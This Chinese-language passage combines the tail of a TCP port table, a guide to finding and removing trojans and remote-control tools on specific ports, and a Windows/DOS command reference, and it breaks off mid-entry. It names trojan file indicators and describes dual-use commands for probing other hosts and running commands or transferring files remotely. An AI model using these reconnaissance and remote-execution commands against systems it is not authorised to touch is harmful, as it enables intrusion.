6969/tcp acmsoda acmsoda
7010/tcp ups-onlinet onlinet uninterruptable power supplies
7020/tcp dpserve DP Serve
7070/tcp arcp ARCP
7099/tcp lazy-ptop lazy-ptop
7100/tcp font-service X Font Service
7121/tcp virprot-lm Virtual Prototypes License Manager
7174/tcp clutild Clutild
7200/tcp fodms FODMS FLIP
7201/tcp dlip DLIP
7395/tcp winqedit winqedit
7426/tcp pmdmgr OpenView DM Postmaster Manager
7430/tcp xmpv7 OpenView DM xmpv7 api pipe
7431/tcp pmd OpenView DM ovc/xmpv3 api pipe
7491/tcp telops-lmd telops-lmd
7511/tcp pafec-lm pafec-lm
7544/tcp nta-ds FlowAnalyzer DisplayServer
7545/tcp nta-us FlowAnalyzer UtilityServer
7588/tcp sun-lm Sun License Manager
7777/tcp cbt cbt
7781/tcp accu-lmgr accu-lmgr
7932/tcp t2-drm Tier 2 Data Resource Manager
7933/tcp t2-brm Tier 2 Business Rules Manager
7999/tcp irdmi2 iRDMI2
8000/tcp irdmi iRDMI
8032/tcp pro-ed ProEd
8400/tcp cvd cvd
8401/tcp sabarsd sabarsd
8402/tcp abarsd abarsd
8403/tcp admind admind
8450/tcp npmp npmp
8473/tcp vp2p Vitual Point to Point
8888/tcp ddi-tcp-1 NewsEDGE server TCP (TCP 1)
8889/tcp ddi-tcp-2 Desktop Data TCP 1
8890/tcp ddi-tcp-3 Desktop Data TCP 2
8891/tcp ddi-tcp-4 Desktop Data TCP 3: NESS application
8892/tcp ddi-tcp-5 Desktop Data TCP 4: FARM product
8893/tcp ddi-tcp-6 Desktop Data TCP 5: NewsEDGE/Web application
8894/tcp ddi-tcp-7 Desktop Data TCP 6: COAL application
9000/tcp cslistener CSlistener
9006/tcp sctp SCTP
9090/tcp websm WebSM
9535/tcp man
9594/tcp msgsys Message System
9595/tcp pds Ping Discovery Service
9876/tcp sd Session Director
9992/tcp palace Palace
9993/tcp palace Palace
9994/tcp palace Palace
9995/tcp palace Palace
9996/tcp palace Palace
9997/tcp palace Palace
9998/tcp distinct32 Distinct32
9999/tcp distinct distinct
10000/tcp ndmp Network Data Management Protocol
11000/tcp irisa IRISA
11001/tcp metasys Metasys
12753/tcp tsaf tsaf port
13160/tcp i-zipqd I-ZIPQD
13720/tcp bprd BPRD Protocol (VERITAS NetBackup)
13721/tcp bpbrm BPBRM Protocol (VERITAS NetBackup)
13782/tcp bpcd VERITAS NetBackup
17219/tcp chipper Chipper
18000/tcp biimenu Beckman Instruments, Inc.
19410/tcp hp-sco hp-sco
19411/tcp hp-sca hp-sca
19541/tcp jcp JCP Client
21845/tcp webphone webphone
21846/tcp netspeak-is NetSpeak Corp. Directory Services
21847/tcp netspeak-cs NetSpeak Corp. Connection Services
21848/tcp netspeak-acd NetSpeak Corp. Automatic Call Distribution
21849/tcp netspeak-cps NetSpeak Corp. Credit Processing System
22273/tcp wnn6 wnn6
22555/tcp vocaltec-wconf Vocaltec Web Conference
22800/tcp aws-brf Telerate Information Platform LAN
22951/tcp brf-gw Telerate Information Platform WAN
24000/tcp med-ltp med-ltp
24004/tcp med-ovw med-ovw
24005/tcp med-ci med-ci
25000/tcp icl-twobase1 icl-twobase1
25001/tcp icl-twobase2 icl-twobase2
25002/tcp icl-twobase3 icl-twobase3
25003/tcp icl-twobase4 icl-twobase4
25004/tcp icl-twobase5 icl-twobase5
25005/tcp icl-twobase6 icl-twobase6
25006/tcp icl-twobase7 icl-twobase7
25007/tcp icl-twobase8 icl-twobase8
25008/tcp icl-twobase9 icl-twobase9
25009/tcp icl-twobase10 icl-twobase10
25793/tcp vocaltec-hos Vocaltec Address Server
26000/tcp quake quake
26208/tcp wnn6-ds wnn6-ds
45678/tcp eba EBA PRISE
47557/tcp dbbrowse Databeam Corporation
47806/tcp ap ALC Protocol
47808/tcp bacnet Building Automation and Control Networks
常用端口关闭方法:
113端口木马的清除(仅适用于windows系统):
这是一个基于irc聊天室控制的木马程序。
1.首先使用netstat -an命令确定自己的系统上是否开放了113端口
2.使用fport命令察看出是哪个程序在监听113端口
fport工具下载
例如我们用fport看到如下结果:
Pid Process Port Proto Path
392 svchost -> 113 TCP C:\WINNT\system32\vhos.exe
我们就可以确定在监听在113端口的木马程序是vhos.exe而该程序所在的路径为
c:\winnt\system32下。
3.确定了木马程序名(就是监听113端口的程序)后,在任务管理器中查找到该进程,
并使用管理器结束该进程。
4.在开始-运行中键入regedit运行注册表管理程序,在注册表里查找刚才找到那个程序,
并将相关的键值全部删掉。
5.到木马程序所在的目录下删除该木马程序。(通常木马还会包括其他一些程序,如
rscan.exe、psexec.exe、ipcpass.dic、ipcscan.txt等,根据
木马程序不同,文件也有所不同,你可以通过察看程序的生成和修改的时间来确定与
监听113端口的木马程序有关的其他程序)
6.重新启动机器。
3389端口的关闭:
首先说明3389端口是windows的远程管理终端所开的端口,它并不是一个木马程序,请先
确定该服务是否是你自己开放的。如果不是必须的,请关闭该服务。
win2000关闭的方法:
win2000server 开始-->程序-->管理工具-->服务里找到Terminal Services服务项,
选中属性选项将启动类型改成手动,并停止该服务。
win2000pro 开始-->设置-->控制面板-->管理工具-->服务里找到Terminal Services
服务项,选中属性选项将启动类型改成手动,并停止该服务。
winxp关闭的方法:
在我的电脑上点右键选属性-->远程,将里面的远程协助和远程桌面两个选项框里的勾去掉。
4899端口的关闭:
首先说明4899端口是一个远程控制软件(remote administrator)服务端监听的端口,他不能
算是一个木马程序,但是具有远程控制功能,通常杀毒软件是无法查出它来的,请先确定该服
务是否是你自己开放并且是必需的。如果不是请关闭它。
关闭4899端口:
请在开始-->运行中输入cmd(98以下为command),然后cd C:\winnt\system32(你的系统
安装目录),输入r_server.exe /stop后按回车。
然后在输入r_server /uninstall /silence
到C:\winnt\system32(系统目录)下删除r_server.exe admdll.dll radbrv.dll三个文件
5800,5900端口:
1.首先使用fport命令确定出监听在5800和5900端口的程序所在位置(通常会是c:\winnt\fonts\
explorer.exe)
2.在任务管理器中杀掉相关的进程(注意有一个是系统本身正常的,请注意!如果错杀可以重新
运行c:\winnt\explorer.exe)
3.删除C:\winnt\fonts\中的explorer.exe程序。
4.删除注册表HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run中的
Explorer项。
5.重新启动机器。
6129端口的关闭:
首先说明6129端口是一个远程控制软件(dameware nt utilities)服务端监听得端口,他不是
一个木马程序,但是具有远程控制功能,通常的杀毒软件是无法查出它来的。请先确定该服务
是否是你自己安装并且是必需的,如果不是请关闭。
关闭6129端口:
选择开始-->设置-->控制面板-->管理工具-->服务
找到DameWare Mini Remote Control项点击右键选择属性选项,将启动类型改成禁用后
停止该服务。
到c:\winnt\system32(系统目录)下将DWRCS.EXE程序删除。
到注册表内将HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\DWMRCS表项删除。
1029端口和20168端口:
这两个端口是lovgate蠕虫所开放的后门端口。
蠕虫相关信息请参见:Lovgate蠕虫:http://it.rising.com.cn/newSite/ ... rus/Antivirus_Base/
TopicExplorerPagePackage/lovgate.htm
你可以下载专杀工具:http://it.rising.com.cn/service/ ... ovGate_download.htm
使用方法:下载后直接运行,在该程序运行结束后重起机器后再运行一遍该程序。
45576端口:
这是一个代理软件的控制端口,请先确定该代理软件并非你自己安装(代理软件会给你的机器带
来额外的流量)
关闭代理软件:
1.请先使用fport察看出该代理软件所在的位置
2.在服务中关闭该服务(通常为SkSocks),将该服务关掉。
3.到该程序所在目录下将该程序删除。
对于139端口攻击的防范针对不同系统的设置也有所不同,下面就来分别描述。
针对使用Windows 9x系统拨号上网用户,可以不必登录到NT局域网络环境,打开控制面板,然后双击“网络”图标,在“主网络登录”中选择“Microsoft友好登录”,不必选择“Windows网络用户”方式。此外,也不必设置“文件打印共享”
对于Windows NT用户,可以取消NetBIOS与TCP/IP协议的绑定,打开“控制面板”,然后双击“网络”图标,在“NetBIOS接口”中选择“WINS客户(TCP/IP)”为“禁用”,并重新启动计算机即可。
Windows 2000用户可以使用鼠标右键单击“网络邻居”图标,然后选择“属性”命令,打开“网络和拨号连接”对话框,用鼠标右键单击“本地连接”图标,然后执行“属性”命令,打开“本地连接属性”对话框。双击“Internet协议(TCP/IP)”,在打开的对话框中单击[高级]按钮。打开“高级TCP/IP设置”对话框,选择“选项”选项卡,在列表中单击选中“TCP/IP筛选”选项
单击[属性]按钮,在“只允许”单击[添加]按钮,填入除了139之外要用到的端口。
对于个人上网用户可以使用“天网防火墙”定制防火墙规则。启动“天网个人防火墙”,选择一条空规则,设置数据包方向为“接收”,对方IP地址选“任何地址”,协议设定为“TCP”,本地端口设置为“139到139”,对方端口设置为“0到0”,设置标志位为“SYN”,动作设置为“拦截”,最后单击[确定]按钮,并在“自定义IP规则”列表中勾选此规则即可启动拦截139端口攻击了.了解139端口是为了更好地
经常不用的端口可以通过关闭139端口的方法来关闭。
dir 列文件名 deltree 删除目录树 cls 清屏 cd 改变当前目录
copy 拷贝文件 diskcopy 复制磁盘 del 删除文件 format 格式化磁盘
edit 文本编辑 mem 查看内存状况 md 建立子目录 move 移动文件、改目录名
more 分屏显示 type 显示文件内容 rd 删除目录 sys 制作DOS系统盘
ren 改变文件名 xcopy 拷贝目录与文件 chkdsk 检查磁盘 attrib 设置文件属性
fdisk 硬盘分区 date 显示及修改日期 label 设置卷标号 defrag 磁盘碎片整理
msd 系统检测 path 设置搜寻目录 share 文件共享 memmaker内存优化管理
help 帮助 restore 恢复备份文件 set 设置环境变量 time 显示及修改时间
tree 列目录树 debug 随机调试程序 doskey 重新调用DOS命令 prempt 设置提示符 undelete恢复被删的文件 scandisk检测、修理磁盘
不常用DOS命令
diskcomp磁盘比较 append 设置非执行文件路径
expand 还原DOS文件 fasthelp快速显示帮助信息
fc 文件比较 interink启动服务器
setver 设置版本 intersvr启动客户机
subst 路径替换 qbasic Basic集成环境
vsafe 防病毒 unformat恢复已格式化的磁盘
ver 显示DOS版本号 smartdrv设置磁盘加速器
vol 显示磁盘卷标号 lh 将程序装入高端内存
ctty 改变控制设备 emm386 扩展内存管理
常用命令具体介绍:
一、Dir
显示目录文件和子目录列表,呵呵,这个当然是人人要知道的。
可以使用通配符(? 和 *),?表通配一个字符,*表通配任意字符
*.后缀
指定要查看后缀的文件。 上面其实也可以为“ . 后缀”,例如dir *.exe 等于dir .exe
/p
每次显示一个列表屏幕。要查看下一屏,请按键盘上的任意键。
/w
以宽格式显示列表,在每一行上最多显示 5 个文件名或目录名。
/s
列出指定目录及所有子目录中出现的每个指定的文件名。比win环境下的查找快多了
dir *.* -> a.txt 把当前目录文件列表写入a.txt
dir *.* /s -> a.txt 把当前目录文件列表写入a.txt,包括子目录下文件。
二、Attrib
显示、设置或删除指派给文件或目录的只读、存档、系统以及隐藏属性。如果在不含参数的情况下使用,则 attrib 会显示当前目录中所有文件的属性。
+r
设置只读属性。
-r
清除只读属性。
+a
设置存档文件属性。
-a
清除存档文件属性。
+s
设置系统属性。
-s
清除系统属性。
+h
设置隐藏属性。
-h
清除隐藏属性。
三、Cls
清除显示在命令提示符窗口中的所有信息,并返回空窗口,即“清屏”
四、Exit
退出当前命令解释程序并返回到系统。
五、format
格式化
/q
执行快速格式化。删除以前已格式化卷的文件表和根目录,但不在扇区之间扫描损坏区域。使用 /q 命令行选项应该仅格式化以前已格式化的完好的卷。
六、Ipconfig
显示所有当前的 TCP/IP 网络配置值、刷新动态主机配置协议 (DHCP) 和域名系统 (DNS) 设置。使用不带参数的 ipconfig 可以显示所有适配器的 IP 地址、子网掩码、默认网关。
/all
显示所有适配器的完整 TCP/IP 配置信息。
ipconfig 等价于 winipcfg,后者在ME、98 和 95 上可用。尽管 Windows XP 没有提供象 winipcfg 命令一样的图形化界面,但可以使用“网络连接”查看和更新 IP 地址。要做到这一点,请打开 网络连接,右键单击某一网络连接,单击“状态”,然后单击“支持”选项卡。
该命令最适用于配置为自动获取 IP 地址的计算机。它使用户可以确定哪些 TCP/IP 配置值是由 DHCP、自动专用 IP 地址 (APIPA) 和其他配置配置的。
七、md
创建目录或子目录
八、Move
将一个或多个文件从一个目录移动到指定的目录。
九、Nbtstat
显示本地计算机和远程计算机的基于 TCP/IP (NetBT) 协议的 NetBIOS 统计资料、NetBIOS 名称表和 NetBIOS 名称缓存。Nbtstat 可以刷新 NetBIOS 名称缓存和注册的 Windows Internet 名称服务 (WINS) 名称。使用不带参数的 nbtstat 显示帮助。Nbtstat 命令行参数区分大小写。
-a remotename
显示远程计算机的 NetBIOS 名称表,其中,RemoteName 是远程计算机的 NetBIOS 计算机名称。
-A IPAddress
显示远程计算机的 NetBIOS 名称表,其名称由远程计算机的 IP 地址指定(以小数点分隔)。
十、Netstat
显示活动的 TCP 连接、计算机侦听的端口、以太网统计信息、IP 路由表、IPv4 统计信息(对于 IP、ICMP、TCP 和 UDP 协议)以及 IPv6 统计信息(对于 IPv6、ICMPv6、通过 IPv6 的 TCP 以及通过 IPv6 的 UDP 协议)。使用时如果不带参数,netstat 显示活动的 TCP 连接。
-a
显示所有活动的 TCP 连接以及计算机侦听的 TCP 和 UDP 端口。
十一、Ping
通过发送“网际消息控制协议 (ICMP)”回响请求消息来验证与另一台 TCP/IP 计算机的 IP 级连接。回响应答消息的接收情况将和往返过程的次数一起显示出来。Ping 是用于检测网络连接性、可到达性和名称解析的疑难问题的主要 TCP/IP 命令。如果不带参数,ping 将显示帮助。名称和Ip地址解析是它的最简单应用也是用的最多的。
-t
指定在中断前 ping 可以持续发送回响请求信息到目的地。要中断并显示统计信息,请按 CTRL-BREAK。要中断并退出 ping,请按 CTRL-C。
-lSize
指定发送的回响请求消息中“数据”字段的长度(以字节表示)。默认值为 32。size 的最大值是 65,527。
十二、Rename (Ren)
更改文件的名称。
例如 ren *.abc *.cba
十三、Set
显示、设置或删除环境变量。如果没有任何参数,set 命令将显示当前环境设置。
十四、Shutdown
允许您关闭或重新启动本地或远程计算机。如果没有使用参数,shutdown 将注销当前用户。
-m ComputerName
指定要关闭的计算机。
-t xx
将用于系统关闭的定时器设置为 xx 秒。默认值是 20 秒。
-l
注销当前用户,这是默认设置。-m ComputerName 优先。
-s
关闭本地计算机。
-r
关闭之后重新启动。
-a
中止关闭。除了 -l 和 ComputerName 外,系统将忽略其它参数。在超时期间,您只可以使用 -a。
十五、System File Checker (sfc)
win下才有,在重新启动计算机后扫描和验证所有受保护的系统文件。
/scannow
立即扫描所有受保护的系统文件。
/scanonce
一次扫描所有受保护的系统文件。
/purgecache
立即清除“Windows 文件保护”文件高速缓存,并扫描所有受保护的系统文件。
/cachesize=x
设置“Windows 文件保护”文件高速缓存的大小,以 MB 为单位。
十六、type
显示文本文件的内容。使用 type 命令查看文本文件或者是bat文件而不修改文件
十七、Tree
图像化显示路径或驱动器中磁盘的目录结构。
十八、Xcopy
复制文件和目录,包括子目录。
/s
复制非空的目录和子目录。如果省略 /s,xcopy 将在一个目录中工作。
/e
复制所有子目录,包括空目录。
十九、copy
将一个或多个文件从一个位置复制到其他位置
二十、del
删除指定文件。
ftp和bat批命令和net和telnet由于子命令太多,这里不说了,不过这几个都是常用到的。
网络常用命令:
1.最基本,最常用的,测试物理网络的
ping 192.168.10.88 -t ,参数-t是等待用户去中断测试
2.查看DNS、IP、Mac等
A.Win98:winipcfg
B.Win2000以上:Ipconfig/all
C.NSLOOKUP:如查看河北的DNS
C:\>nslookup
Default Server: ns.hesjptt.net.cn
Address: 202.99.160.68
>server 202.99.41.2 则将DNS改为了41.2
> pop.pcpop.com
Server: ns.hesjptt.net.cn
Address: 202.99.160.68
Non-authoritative answer:
Name: pop.pcpop.com
Address: 202.99.160.212
3.网络信使
Net send 计算机名/IP|* (广播) 传送内容,注意不能跨网段
net stop messenger 停止信使服务,也可以在面板-服务修改
net start messenger 开始信使服务
4.探测对方对方计算机名,所在的组、域及当前用户名
ping -a IP -t ,只显示NetBios名
nbtstat -a 192.168.10.146 比较全的
5.netstat -a 显示出你的计算机当前所开放的所有端口
netstat -s -e 比较详细的显示你的网络资料,包括TCP、UDP、ICMP 和 IP的统计等
6.探测arp绑定(动态和静态)列表,显示所有连接了我的计算机,显示对方IP和MAC地址
arp -a
7.在代理服务器端
捆绑IP和MAC地址,解决局域网内盗用IP:
ARP -s 192.168.10.59 00-50-ff-6c-08-75
解除网卡的IP与MAC地址的绑定:
arp -d 网卡IP
8.在网络邻居上隐藏你的计算机
net config server /hidden:yes
net config server /hidden:no 则为开启
9.几个net命令
A.显示当前工作组服务器列表 net view,当不带选项使用本命令时,它就会显示当前域或网络上的计算机上的列表。
比如:查看这个IP上的共享资源,就可以
C:\>net view 192.168.10.8
在 192.168.10.8 的共享资源
资源共享名 类型 用途 注释
--------------------------------------
网站服务 Disk
命令成功完成。
B.查看计算机上的用户帐号列表 net user
C.查看网络链接 net use
例如:net use z: \\192.168.10.8\movie 将这个IP的movie共享目录映射为本地的Z盘
D.记录链接 net session
例如:
C:\>net session
计算机 用户名 客户类型 打开空闲时间
-------------------------------------------------------------------------------
\\192.168.10.110 ROME Windows 2000 2195 0 00:03:12
\\192.168.10.51 ROME Windows 2000 2195 0 00:00:39
命令成功完成。
10.路由跟踪命令
A.tracert pop.pcpop.com
B.pathping pop.pcpop.com 除了显示路由外,还提供325S的分析,计算丢失包的%
11.关于共享安全的几个命令
A.查看你机器的共享资源 net share
B.手工删除共享
net share c$ /d
net share d$ /d
net share ipc$ /d
net share admin$ /d
注意$后有空格。
C.增加一个共享:
c:\net share mymovie=e:\downloads\movie /users:1
mymovie 共享成功。
同时限制链接用户数为1人。
12.在DOS行下设置静态IP
A.设置静态IP
CMD
netsh
netsh>int
interface>ip
interface ip>set add "本地链接" static IP地址 mask gateway
B.查看IP设置
interface ip>show address
Arp
显示和修改"地址解析协议 (ARP)"缓存中的项目。ARP 缓存中包含一个或多个表,它们用于存储 IP 地址及其经过解析的以太网或令牌环物理地址。计算机上安装的每一个以太网或令牌环网络适配器都有自己单独的表。如果在没有参数的情况下使用,则 arp 命令将显示帮助信息。
语法
arp [-a [InetAddr] [-N IfaceAddr]] [-g [InetAddr] [-N IfaceAddr]] [-d InetAddr [IfaceAddr]] [-s InetAddr EtherAddr [IfaceAddr]]
参数
-a [InetAddr] [-N IfaceAddr]
显示所有接口的当前 ARP 缓存表。要显示指定 IP 地址的 ARP 缓存项,请使用带有 InetAddr 参数的 arp -a,此处的 InetAddr 代表指定的 IP 地址。要显示指定接口的 ARP 缓存表,请使用 -N IfaceAddr 参数,此处的 IfaceAddr 代表分配给指定接口的 IP 地址。-N 参数区分大小写。
-g [InetAddr] [-N IfaceAddr]
与 -a 相同。
-d InetAddr [IfaceAddr]
删除指定的 IP 地址项,此处的 InetAddr 代表 IP 地址。对于指定的接口,要删除表中的某项,请使用 IfaceAddr 参数,此处的 IfaceAddr 代表分配给该接口的 IP 地址。要删除所有项,请使用星号 (*) 通配符代替 InetAddr。
-s InetAddr EtherAddr [IfaceAddr]
向 ARP 缓存添加可将 IP 地址 InetAddr 解析成物理地址 EtherAddr 的静态项。要向指定接口的表添加静态 ARP 缓存项,请使用 IfaceAddr 参数,此处的 IfaceAddr 代表分配给该接口的 IP 地址。
/?
在命令提示符显示帮助。
注释
InetAddr 和 IfaceAddr 的 IP 地址用带圆点的十进制记数法表示。
物理地址 EtherAddr 由六个字节组成,这些字节用十六进制记数法表示并且用连字符隔开(比如,00-AA-00-4F-2A-9C)。
通过 -s 参数添加的项属于静态项,它们不会 ARP 缓存中超时。如果终止 TCP/IP 协议后再启动,这些项会被删除。要创建永久的静态 ARP 缓存项,请在批处理文件中使用适当的 arp 命令并通过"计划任务程序"在启动时运行该批处理文件。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要显示所有接口的 ARP 缓存表,可键入:
arp -a
对于指派的 IP 地址为 10.0.0.99 的接口,要显示其 ARP 缓存表,可键入:
arp -a -N 10.0.0.99
要添加将 IP 地址 10.0.0.80 解析成物理地址 00-AA-00-4F-2A-9C 的静态 ARP 缓存项,可键入: arp -s 10.0.0.80 00-AA-00-4F-2A-9C
13.At
计划在指定时间和日期在计算机上运行命令和程序。at 命令只能在"计划"服务运行时使用。如果在没有参数的情况下使用,则 at 列出已计划的命令。
语法
at [\\ComputerName] [{[ID] [/delete]|/delete [/yes]}]
at [[\\ComputerName] hours:minutes [/interactive] [{/every:date[,...]|/next:date[,...]}] command]
参数
\\computername
指定远程计算机。如果省略该参数,则 at 计划本地计算机上的命令和程序。
ID
指定指派给已计划命令的识别码。
/delete
取消已计划的命令。如果省略了 ID,则计算机中所有已计划的命令将被取消。
/yes
删除已计划的事件时,对来自系统的所有询问都回答"是"。
hours:minutes
指定命令运行的时间。该时间用 24 小时制(即从 00:00 [午夜] 到 23:59)的 小时: 分钟格式表示。
/interactive
对于在运行 command 时登录的用户,允许 command 与该用户的桌面进行交互。
/every:
在每个星期或月的指定日期(例如,每个星期四,或每月的第三天)运行 command 命令。
date
指定运行命令的日期。可以指定一周的某日或多日(即,键入 M、T、W、Th、F、S、Su)或一个月中的某日或多日(即,键入从 1 到31 之间的数字)。用逗号分隔多个日期项。如果省略了 date,则 at 使用该月的当前日。
/next:
在下一个指定日期(比如,下一个星期四)到来时运行 command。
command
指定要运行的 Windows 命令、程序(.exe 或 .com 文件)或批处理程序(.bat 或 .cmd 文件)。当命令需要路径作为参数时,请使用绝对路径,也就是从驱动器号开始的整个路径。如果命令在远程计算机上,请指定服务器和共享名的通用命名协定 (UNC) 符号,而不是远程驱动器号。
/?
在命令提示符显示帮助。
注释
Schtasks 是功能更为强大的超集命令行计划工具,它含有 at 命令行工具中的所有功能。对于所有的命令行计划任务,都可以使用 schtasks 来替代 at。有关 schtasks 的详细信息,请参阅"相关主题"。
使用 at
使用 at 命令时,要求您必须是本地 Administrators 组的成员。
加载 Cmd.exe
在运行命令之前,At 不会自动加载 Cmd.exe (命令解释器)。如果没有运行可执行文件 (.exe),则在命令开头必须使用如下所示的方法专门加载 Cmd.exe:
cmd /c dir > c:\test.out。
查看已计划的命令
当不带命令行选项使用 at 时,计划任务会出现在类似于以下格式的表中:
Status ID Day Time Command Line
OK 1 Each F 4:30 PM net send group leads status due
OK 2 Each M 12:00 AM chkstor > check.file
OK 3 Each F 11:59 PM backup2.bat
包含标识号 (ID)
当在命令提示下使用带有标识号 (ID) 的 at 命令时,单个任务项的信息会显示在类似于下面的格式中:
Task ID: 1
Status:OK
Schedule:Each F
Time of Day:4:30 PM
Command:net send group leads status due当计划带有 at 的命令(尤其是带有命令行选项的命令)后,要通过键入不带命令行选项的 at 来检查该命令语法是否输入正确。如果显示在"命令行"列中的信息不正确,请删除该命令,然后重新键入它。如果还不正确,则可以在重新键入该命令时让它少带些命令行选项。 查看结果
使用 at 的已经计划的命令作为后台程序运行。运行结果不会显示在计算机上。要将输出重定向到文件,请使用重定向符号 (>)。如果将输出重定向到文件,则不论是在命令行还是在批处理文件中使用 at,都需要在重定向符号之前使用转义符 (^)。例如,要重定向输出到 Output.text 文件,则要键入:
at 14:45 c:\test.bat ^>c:\output.txt
执行命令的当前目录为 systemroot 文件夹。
更改系统时间
在使用 at 命令计划了要运行的命令之后,如果更改了计算机的系统时间,则通过键入不带命令行选项的 at 可使 at 计划程序与修改后的系统时间同步。
存储命令
已计划的命令存储在注册表中。这样,如果重新启动"计划"服务,则不会丢失计划任务。
连接到网络驱动器
对于需要访问网络的计划作业,请不要使用已重新定向的驱动器。"计划"服务可能无法访问这些重定向的驱动器,或者,在该计划任务运行时如果有其他用户登录,则这些重定向的驱动器可能不会出现。因此,对于计划作业,请使用 UNC 路径。例如:
at 1:00pm my_backup \\server\share
请不要使用下述语法(其中 x: ?表示由用户建立的连接):
at 1:00pm my_backup x:
如果计划了一个使用驱动器号的 at 命令来连接共享目录,则应包含一个 at 命令以使在完成该驱动器的使用时断开与驱动器的连接。如果不能断开与驱动器的连接,则在命令提示下,所指派的驱动器号将不可用。
范例
要显示 Marketing 服务器上已计划的命令列表,请键入:
at \\marketing
要了解服务器 Corp 上标识号为 3 的命令的详细信息,请键入:
at \\corp 3
要计划在上午 8:00 于 Corp 服务器上运行网络共享命令,并将该列表重定向到 Maintenance 服务器的 Corp.txt 文件(位于 Reports 共享目录下)中,请键入:
at \\corp 08:00 cmd /c "net share reports=d:\marketing\reports >> \\maintenance\reports\corp.txt"
为了在每五天后的午夜将 Marketing 服务器的硬盘驱动器备份到磁带驱动器,首先创建名为 Archive.cmd 的批处理程序(它含有备份命令),然后计划该批处理程序的运行,为此请键入:
at \\marketing 00:00 /every:5,10,15,20,25,30 archive
要取消当前服务器上已计划的所有命令,请按下述方法清除 at 计划信息:
at /delete
如果要运行的命令不是可执行 (.exe) 文件,请按如下所示的方法在该命令之前使用 cmd /c 来加载 Cmd.exe:
cmd /c dir > c:\test.out。
14.Rsh
在运行 RSH 服务的远程计算机上运行命令。Windows XP 和 Windows 2000 不提供 RSH 服务。Windows 2000 Server Resource Kit 提供名为 Rshsvc.exe 的 RSH 服务。使用不带参数的 rsh 显示帮助。
语法
rsh [Host] [-l UserName] [-n] [Command]
参数
Host
指定运行 command 的远程计算机。
-l UserName
指定远程计算机上使用的用户名。在省略情况下,使用当前登录用户的名称。
-n
将 rsh 的输入重定向到 NULL 设备。这防止本地计算机命令结果的显示。
Command
指定要运行的命令。
/?
在命令提示符显示帮助。
注释
标准操作
rsh 命令将标准输入复制到远程 command,将远程 command 的标准输出复制到其标准输出,将远程 command 的标准错误复制到其标准错误。Rsh 通常在远程命令终止时终止。
使用重定向符号
为了使重定向在远程计算机上发生,要以引号引住重定向符号(例如 ">>")。如果不使用引号,重定向会在本地计算机发生。例如,以下命令将远程文件"RemoteFile"附加到本地文件"LocalFile"中:
rsh othercomputer cat remotefile >> localfile
以下命令将远程文件 Remotefile 附加到远程文件 otherremotefile 中:
rsh othercomputer cat remotefile ">>" otherremotefile
使用 rsh
在使用已登录到某个域并且运行 Windows XP Professional 的计算机时,该域的主域控制器必须可用于确认用户名或 rsh 命令失败。
.rhosts 文件
.rhosts 文件通常许可 UNIX 系统的网络访问权限。.rhosts 文件列出可以访问远程计算机的计算机名及关联的登录名。在正确配置了 .rhosts 文件的远程计算机上运行 rcp、rexec 或 rsh 命令时,您不必提供远程计算机的登录和密码信息。
.rhosts 文件是一个文本文件,该文件中每一行为一个条目。条目由本地计算机名、本地用户名和有关该条目的所有注释组成。每个条目均由制表符或空格分开,注释用符号 (#) 打头。例如:
host7 #This computer is in room 31A
.rhosts 文件必须在远程计算机的用户主目录中。有关远程计算机 .rhosts 文件特定执行的详细信息,请参阅远程系统的文档。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要以名称 admin1 在远程计算机 vax1 上执行 telcon 命令,请键入:
rsh vax1 -l admin1 telcon
15.Tftp
向运行平凡文件传输协议 (TFTP) 服务或 daemon 的远程计算机(尤其是运行 UNIX 的计算机)传输文件或从运行平凡文件传输协议 (TFTP) 服务或 daemon 的远程计算机(尤其是运行 UNIX 的计算机)传输文件。
语法
tftp [-i] [Host] [{get | put}] [Source] [Destination]
参数
-i
指定二进制图像传送模式(也称为八进制模式)。在二进制图像模式下,文件以一个字节为单位进行传输。在传送二进制文件时使用该模式。如果省略了 -i,文件将以 ASCII 模式传送。这是默认的传送模式。该模式将行尾 (EOL) 字符转换为指定计算机的适当格式。传送文本文件时使用该模式。如果文件传送成功,将显示数据传输率。
Host
指定本地或远程计算机。
put
将本地计算机上的 Destination 文件传送到远程计算机上的 Source 文件。因为 TFTP 协议不支持用户身份验证,所以用户必须登录到远程计算机,同时文件在远程计算机上必须可写。
get
将远程计算机上的 Destination 文件传送到本地计算机上的 Source 文件。
Source
指定要传送的文件。
Destination
指定将文件传送到的位置。如果省略了 Destination,将假定它与 Source 同名。
/?
在命令提示符显示帮助。
注释
使用 get 参数
如果将本地计算机上的文件 FileTwo 传送到远程计算机上的文件 FileOne,则指定 put。如果将远程计算机上的文件 FileTwo 传送到远程计算机上的文件 FileOne,则指定 get。
Windows XP 或 Windows 2000 不提供一般用途的 TFTP 服务器。Windows 2000 提供的 TFTP 服务器服务只为 Windows XP 和 Windows 2000 客户端计算机提供远程引导功能。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要从本地计算机将文件 Users.txt 传送到远程计算机 vax1 上的 Users19.txt,请键入:
tftp vax1 put users.txt users19.txt
16.Nbtstat
显示本地计算机和远程计算机的基于 TCP/IP (NetBT) 协议的 NetBIOS 统计资料、NetBIOS 名称表和 NetBIOS 名称缓存。Nbtstat 可以刷新 NetBIOS 名称缓存和注册的 Windows Internet 名称服务 (WINS) 名称。使用不带参数的 nbtstat 显示帮助。
语法
nbtstat [-a RemoteName] [-A IPAddress] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [Interval]
参数
-a remotename
显示远程计算机的 NetBIOS 名称表,其中,RemoteName 是远程计算机的 NetBIOS 计算机名称。NetBIOS 名称表是运行在该计算机上的应用程序使用的 NetBIOS 名称列表。
-A IPAddress
显示远程计算机的 NetBIOS 名称表,其名称由远程计算机的 IP 地址指定(以小数点分隔)。
-c
显示 NetBIOS 名称缓存内容、NetBIOS 名称表及其解析的各个地址。
-n
显示本地计算机的 NetBIOS 名称表。Registered 中的状态表明该名称是通过广播或 WINS 服务器注册的。
-r
显示 NetBIOS 名称解析统计资料。在配置为使用 WINS 的 Windows XP 计算机上,该参数将返回已通过广播和 WINS 解析和注册的名称号码。
-R
清除 NetBIOS 名称缓存的内容并从 Lmhosts 文件中重新加载带有 #PRE 标记的项目。
-RR
重新释放并刷新通过 WINS 注册的本地计算机的 NetBIOS 名称。
-s
